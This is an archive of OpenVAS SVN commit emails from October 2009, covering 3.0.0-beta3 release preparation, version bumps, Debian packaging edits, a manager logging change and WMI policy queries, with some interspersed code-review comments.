+ +Main changes compared to 2.0.x: + +* IPv6 support +* WMI-Client support +* Integration of openvas-libnasl +* New library "base" +* New library "omp" +* Former libopenvas renamed to libopenvas_misc +* New NVT cache implementation to overcome limitations +* Several files from openvas-client integrated +* Use of "cmake" to build base, omp and nasl +* glib dependency raised from 2.6 to 2.12 + +Main changes compared to 3.0.0-beta2: + +* Minimum cmake version raised from 2.4 to 2.6 +* Internal library reorganisation +* Proctitle now contains the correct binary name for openvas-scanner +* Configured values for the local state directory and for the system + configuration directory are now honoured correctly during build time + + openvas-libraries 3.0.0-beta2 (2009-09-28) This release is the second beta version of openvas-libraries Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:43:06 UTC (rev 5392) @@ -1,3 +1,13 @@ +2009-10-06 Michael Wiegand + + Preparing the openvas-libraries 3.0.0-beta3 release. + + * CHANGES: Updated. + + * VERSION: Set to 3.0.0.beta3. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + 2009-10-06 Felix Wolfsteller * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/VERSION 2009-10-06 09:43:06 UTC (rev 5392) @@ -1 +1 @@ -3.0.0.beta3.SVN +3.0.0.beta3 Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:43:06 UTC (rev 5392) 
@@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:43:06 UTC (rev 5392) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 11:46:36 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:46:36 +0200 (CEST) Subject: [Openvas-commits] r5393 - tags Message-ID: <20091006094636.00946865F477@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:46:36 +0200 (Tue, 06 Oct 2009) New Revision: 5393 Added: tags/openvas-libraries-release-3.0.0-beta3/ Log: Tagging openvas-libraries-3.0.0-beta3 release. Copied: tags/openvas-libraries-release-3.0.0-beta3 (from rev 5392, trunk/openvas-libraries) From scm-commit at wald.intevation.org Tue Oct 6 11:48:22 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:48:22 +0200 (CEST) Subject: [Openvas-commits] r5394 - in trunk/openvas-manager: . src Message-ID: <20091006094822.9CBD785D9F7B@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 11:48:22 +0200 (Tue, 06 Oct 2009) New Revision: 5394 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (init_manage): Log database versions on version failure. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 09:46:36 UTC (rev 5393) +++ trunk/openvas-manager/ChangeLog 2009-10-06 09:48:22 UTC (rev 5394) @@ -1,5 +1,9 @@ 2009-10-06 Matthew Mundell + * src/tasks_sql.h (init_manage): Log database versions on version failure. + +2009-10-06 Matthew Mundell + Complete database initialisation check started yesterday. * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:46:36 UTC (rev 5393) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:48:22 UTC (rev 5394) @@ -918,7 +918,15 @@ { if (database_version && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + { + g_message ("%s: database version of database: %s\n", + __FUNCTION__, + database_version); + g_message ("%s: database version supported by manager: %s\n", + __FUNCTION__, + G_STRINGIFY (DATABASE_VERSION)); + return -2; + } /* If database_version was NULL then meta was missing, so assume * that the database is missing, which is OK. */ 
@@ -928,7 +936,15 @@ if (database_version) { if (strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + { + g_message ("%s: database version of database: %s\n", + __FUNCTION__, + database_version); + g_message ("%s: database version supported by manager: %s\n", + __FUNCTION__, + G_STRINGIFY (DATABASE_VERSION)); + return -2; + } } else /* Assume database is missing. */ From scm-commit at wald.intevation.org Tue Oct 6 11:49:30 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:49:30 +0200 (CEST) Subject: [Openvas-commits] r5395 - in trunk/openvas-libraries: . doc Message-ID: <20091006094930.6F7DB861EAD4@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:49:30 +0200 (Tue, 06 Oct 2009) New Revision: 5395 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Post-release version bump. * VERSION: Set to 3.0.0.beta4.SVN. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:49:30 UTC (rev 5395) @@ -1,5 +1,13 @@ 2009-10-06 Michael Wiegand + Post-release version bump. + + * VERSION: Set to 3.0.0.beta4.SVN. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + +2009-10-06 Michael Wiegand + Preparing the openvas-libraries 3.0.0-beta3 release. * CHANGES: Updated. Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/VERSION 2009-10-06 09:49:30 UTC (rev 5395) 
@@ -1 +1 @@ -3.0.0.beta3 +3.0.0.beta4.SVN Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:49:30 UTC (rev 5395) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:49:30 UTC (rev 5395) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 11:55:26 2009 
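Review bot: in src/tasks_sql.h (init_manage, r5394), the same pair of g_message calls is added verbatim in both the nvt_cache_mode branch and the else branch, each directly before "return -2;". Both branches treat a non-NULL database_version that differs from G_STRINGIFY (DATABASE_VERSION) identically, so the comparison and the logging can be done once before the "if (nvt_cache_mode)" split, or moved into a small static helper, which keeps the two messages from drifting apart in later edits.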
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:55:26 +0200 (CEST) Subject: [Openvas-commits] r5396 - trunk/doc/website Message-ID: <20091006095526.CDBCA852FE2A@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:55:26 +0200 (Tue, 06 Oct 2009) New Revision: 5396 Modified: trunk/doc/website/template_header.m4 Log: Update version and download link for openvas-libraries 3.0.0-beta. Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 09:49:30 UTC (rev 5395) +++ trunk/doc/website/template_header.m4 2009-10-06 09:55:26 UTC (rev 5396) @@ -177,7 +177,7 @@

OpenVAS 3.0 BETA:
- -libraries 3.0.0-beta2
+ -libraries 3.0.0-beta3
-scanner 3.0.0-beta2
-client 3.0.0-beta1
Optional:
From scm-commit at wald.intevation.org Tue Oct 6 12:18:16 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:18:16 +0200 (CEST) Subject: [Openvas-commits] r5397 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091006101816.7A778861EAB5@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:18:14 +0200 (Tue, 06 Oct 2009) New Revision: 5397 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules Log: * New upstream release. * rules: Set sysconfdir at configure time. * control: Bumped cmake dependency since it was raised upstream. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 10:18:14 UTC (rev 5397) @@ -1,3 +1,11 @@ +openvas-libraries (3.0.0-beta3) UNRELEASED; urgency=low + + * New upstream release. + * rules: Set sysconfdir at configure time. + * control: Bumped cmake dependency since it was raised upstream. + + -- Michael Wiegand Tue, 06 Oct 2009 12:06:19 +0200 + openvas-libraries (3.0.0-beta2) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 10:18:14 UTC (rev 5397) 
@@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake, libgcrypt11-dev +Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 10:18:14 UTC (rev 5397) @@ -41,7 +41,7 @@ ifneq "$(wildcard /usr/share/misc/config.guess)" "" cp -f /usr/share/misc/config.guess config.guess endif - ./configure $(CROSS) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --localstatedir=/var CFLAGS="$(CFLAGS)" + ./configure $(CROSS) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --localstatedir=/var --sysconfdir=/etc CFLAGS="$(CFLAGS)" build: build-stamp From scm-commit at wald.intevation.org Tue Oct 6 12:48:26 2009 
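Review bot: in debian/changelog (r5397), the new entry is versioned "3.0.0-beta3", which dpkg parses as upstream version 3.0.0 with Debian revision beta3, and that sorts higher than a later final "3.0.0-1", so the final package would not be seen as an upgrade over this beta. A tilde form such as "3.0.0~beta3-1" sorts below the final release and also gives the entry a real Debian revision. The previous entry, "3.0.0-beta2", has the same issue, so the scheme is best fixed before anything is uploaded from this branch.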
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:48:26 +0200 (CEST) Subject: [Openvas-commits] r5398 - in trunk/openvas-scanner: . doc Message-ID: <20091006104826.4C311861EABA@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:48:25 +0200 (Tue, 06 Oct 2009) New Revision: 5398 Modified: trunk/openvas-scanner/CHANGES trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/VERSION trunk/openvas-scanner/doc/Doxyfile trunk/openvas-scanner/doc/Doxyfile_full Log: Preparing the openvas-scanner 3.0.0-beta3 release. * VERSION: Set to 3.0.0.beta3 * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. * CHANGES: Updated. Modified: trunk/openvas-scanner/CHANGES =================================================================== --- trunk/openvas-scanner/CHANGES 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/CHANGES 2009-10-06 10:48:25 UTC (rev 5398) 
@@ -1,3 +1,51 @@ +openvas-scanner 3.0.0-beta3 (2009-10-06) + +This release is the third beta version of openvas-scanner +leading up to the upcoming 3.0 release of OpenVAS. +Apart from the name change from openvas-server to +openvas-scanner, the platform-dependent NVTs as +well as the OpenVAS NVT Feed synchronisation script +are now integrated. + +OpenVAS 3.0 will introduce a new architecture where openvas-libraries +now includes openvas-libnasl as well as redundant code from openvas-client +and where openvas-server is renamed to openvas-scanner and includes any +platform-dependent elements of openvas-plugins. As a result of this, +the source code will shrink, though new features will be added. Also, +for running the scanner now only 2 modules are required (instead of 4 +as for OpenVAS 2.0). + +New features of OpenVAS include support for IPv6 and WMI-Clients. +Version 3.0 prepares the new OpenVAS Manager and OpenVAS Administrator +as optional extension. This combination leverages the vulnerability +scanner to a comprehensive vulnerability management solution. + +The "beta" releases are intended to allow testing of the upcoming +3.0 series. It should be kept separate from OpenVAS 2.0 installations +and not be used in a production environment. + +Many thanks to everyone who has contributed to the 3.0.0 release: +Chandrashekhar B, Tim Brown, Javier Fernández-Sanguino Peña, +Vlatko Kosturjak, Matthew Mundell, Srinivasa NL, Jan Wagner, +Jan-Oliver Wagner, Michael Wiegand and Felix Wolfsteller. + +Main changes compared to 2.0.x: + +* IPv6 support +* Integration of platform dependent NVTs from openvas-plugins +* Integration of openvas-nvt-sync script +* Renamed daemon from openvasd to openvassd +* glib dependency raised from 2.6 to 2.12 +* openvasd-config removed as no other packages require this + package for building. 
+* For the same reason, no header files are installed anymore + +Main changes compared to 3.0.0-beta2: + +* Adjustments for the API changes that happened from + openvas-libraries 3.0.0-beta2 to 3.0.0-beta3. + + openvas-scanner 3.0.0-beta2 (2009-09-28) This release is the second beta version of openvas-scanner Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 10:48:25 UTC (rev 5398) @@ -1,3 +1,13 @@ +2009-10-06 Michael Wiegand + + Preparing the openvas-scanner 3.0.0-beta3 release. + + * VERSION: Set to 3.0.0.beta3 + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + + * CHANGES: Updated. + 2009-10-05 Felix Wolfsteller Removed dependence on libopenvas.h. Modified: trunk/openvas-scanner/VERSION =================================================================== --- trunk/openvas-scanner/VERSION 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/VERSION 2009-10-06 10:48:25 UTC (rev 5398) @@ -1 +1 @@ -3.0.0.beta3.SVN +3.0.0.beta3 Modified: trunk/openvas-scanner/doc/Doxyfile =================================================================== --- trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:48:25 UTC (rev 5398) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-scanner/doc/Doxyfile_full =================================================================== --- trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:48:25 UTC (rev 5398) 
@@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 12:50:55 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:50:55 +0200 (CEST) Subject: [Openvas-commits] r5399 - tags Message-ID: <20091006105055.08106861EABA@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:50:54 +0200 (Tue, 06 Oct 2009) New Revision: 5399 Added: tags/openvas-scanner-release-3.0.0-beta3/ Log: Tagging openvas-scanner 3.0.0-beta3 release. Copied: tags/openvas-scanner-release-3.0.0-beta3 (from rev 5398, trunk/openvas-scanner) From scm-commit at wald.intevation.org Tue Oct 6 12:52:54 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:52:54 +0200 (CEST) Subject: [Openvas-commits] r5400 - in trunk/openvas-scanner: . doc Message-ID: <20091006105254.4A700865F480@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:52:52 +0200 (Tue, 06 Oct 2009) New Revision: 5400 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/VERSION trunk/openvas-scanner/doc/Doxyfile trunk/openvas-scanner/doc/Doxyfile_full Log: Post-release version bump. * VERSION: Set to 3.0.0.beta4.SVN. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 10:52:52 UTC (rev 5400) 
@@ -1,5 +1,13 @@ 2009-10-06 Michael Wiegand + Post-release version bump. + + * VERSION: Set to 3.0.0.beta4.SVN. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + +2009-10-06 Michael Wiegand + Preparing the openvas-scanner 3.0.0-beta3 release. * VERSION: Set to 3.0.0.beta3 Modified: trunk/openvas-scanner/VERSION =================================================================== --- trunk/openvas-scanner/VERSION 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/VERSION 2009-10-06 10:52:52 UTC (rev 5400) @@ -1 +1 @@ -3.0.0.beta3 +3.0.0.beta4.SVN Modified: trunk/openvas-scanner/doc/Doxyfile =================================================================== --- trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:52:52 UTC (rev 5400) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-scanner/doc/Doxyfile_full =================================================================== --- trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:52:52 UTC (rev 5400) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 12:59:30 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:59:30 +0200 (CEST) Subject: [Openvas-commits] r5401 - trunk/doc/website Message-ID: <20091006105930.891A7865F480@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:59:30 +0200 (Tue, 06 Oct 2009) New Revision: 5401 Modified: trunk/doc/website/template_header.m4 Log: Updated version and download link for openvas-scanner 3.0.0-beta. Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 10:52:52 UTC (rev 5400) +++ trunk/doc/website/template_header.m4 2009-10-06 10:59:30 UTC (rev 5401) @@ -178,7 +178,7 @@

OpenVAS 3.0 BETA:
-libraries 3.0.0-beta3
- -scanner 3.0.0-beta2
+ -scanner 3.0.0-beta3
-client 3.0.0-beta1
Optional:
-manager 0.9.0
From scm-commit at wald.intevation.org Tue Oct 6 13:32:00 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:32:00 +0200 (CEST) Subject: [Openvas-commits] r5402 - in trunk/openvas-plugins: . scripts Message-ID: <20091006113200.3D255861EAAC@pyrosoma.intevation.org> Author: chandra Date: 2009-10-06 13:31:57 +0200 (Tue, 06 Oct 2009) New Revision: 5402 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/wmi_rsop.inc Log: Updated RSOP WQL queries Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 10:59:30 UTC (rev 5401) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 11:31:57 UTC (rev 5402) @@ -1,5 +1,10 @@ 2009-10-06 Chandrashekhar B + * scripts/wmi_rsop.inc: + Updated RSOP WQL queries. + +2009-10-06 Chandrashekhar B + * scripts/gb_ibm_db2_unspesified_vuln_win.nasl, scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl, scripts/gb_cpcreator_detect.nasl, Modified: trunk/openvas-plugins/scripts/wmi_rsop.inc =================================================================== --- trunk/openvas-plugins/scripts/wmi_rsop.inc 2009-10-06 10:59:30 UTC (rev 5401) +++ trunk/openvas-plugins/scripts/wmi_rsop.inc 2009-10-06 11:31:57 UTC (rev 5402) @@ -31,7 +31,7 @@ function wmi_rsop_accesstoken(handle) { - query = 'Select * from RSOP_UserPrivilegeRight'; + query = 'Select * from RSOP_UserPrivilegeRight where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -44,7 +44,7 @@ function wmi_rsop_auditpolicy(handle) { - query = 'Select * from RSOP_AuditPolicy'; + query = 'Select * from RSOP_AuditPolicy where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); 
@@ -57,7 +57,7 @@ function wmi_rsop_policysetting(handle) { - query = 'Select * from RSOP_PolicySetting'; + query = 'Select * from RSOP_PolicySetting where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -70,7 +70,7 @@ function wmi_rsop_lockoutpolicy(handle) { - query = 'Select * from RSOP_SecuritySettingBoolean'; + query = 'Select * from RSOP_SecuritySettingBoolean where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -83,7 +83,7 @@ function wmi_rsop_passwdpolicy(handle) { - query = 'Select * from RSOP_SecuritySettingNumeric'; + query = 'Select * from RSOP_SecuritySettingNumeric where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); From scm-commit at wald.intevation.org Tue Oct 6 13:55:48 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:55:48 +0200 (CEST) Subject: [Openvas-commits] r5403 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006115548.E112D861EACF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 13:55:47 +0200 (Tue, 06 Oct 2009) New Revision: 5403 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init Log: * New upstream release. * control: Bumped openvas-libraries dependency. * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:55:47 UTC (rev 5403) 
@@ -1,3 +1,12 @@ +openvas-scanner (3.0.0.beta3-1) UNRELEASED; urgency=low + + * New upstream release. + * control: Bumped openvas-libraries dependency. + * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming + a daemon is the default behaviour). + + -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 11:55:47 UTC (rev 5403) 
@@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch +Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init 2009-10-06 11:55:47 UTC (rev 5403) @@ -22,7 +22,7 @@ # Description: Controls the main OpenVAS daemon "openvassd". ### END INIT INFO -# daemon options (-D implied, not needed) +# daemon options DAEMONOPTS="-q" # time to wait for daemons death, in seconds # don't set it too low or you might not let openvassd die gracefully @@ -80,7 +80,7 @@ return 1 fi check_certs - start-stop-daemon --start --exec $DAEMON -- $DAEMONOPTS -D 2>&1 >/dev/null + start-stop-daemon --start --exec $DAEMON -- $DAEMONOPTS 2>&1 >/dev/null errcode=$? # If we don't sleep then running() might not see the pidfile sleep $DODTIME From scm-commit at wald.intevation.org Tue Oct 6 13:57:01 2009 
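Review bot: In wmi_rsop.inc, the queries in wmi_rsop_policysetting, wmi_rsop_lockoutpolicy and wmi_rsop_passwdpolicy all gain `where precedence=1` with no comment saying why. Add a one-line comment (once at the top of the file is enough) stating which rows the filter is meant to keep, so a later reader does not widen the queries back to `Select *` and silently change what the policy checks report.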
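Review bot: In debian/control (r5403), the new bound `libopenvas3-dev (>= 3.0.0-beta3)` is written with a hyphen, while the changelog entry in the same commit versions the scanner as `3.0.0.beta3-1`. dpkg splits a version at the last hyphen, so `3.0.0-beta3` is read as upstream 3.0.0 with Debian revision beta3, not as a beta of 3.0.0. Write the bound in the scheme the library package actually uses, for example `>= 3.0.0.beta3` if it follows the scanner's changelog.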
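Review bot: In openvas-scanner.init (r5403), the start line that drops `-D` still ends in `2>&1 >/dev/null`. Redirections are applied left to right, so this points stderr at the original stdout and discards only stdout. If the intent is to silence the daemon completely, use `>/dev/null 2>&1`; if stderr is meant to stay visible, drop the `2>&1` so the line says what it does.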
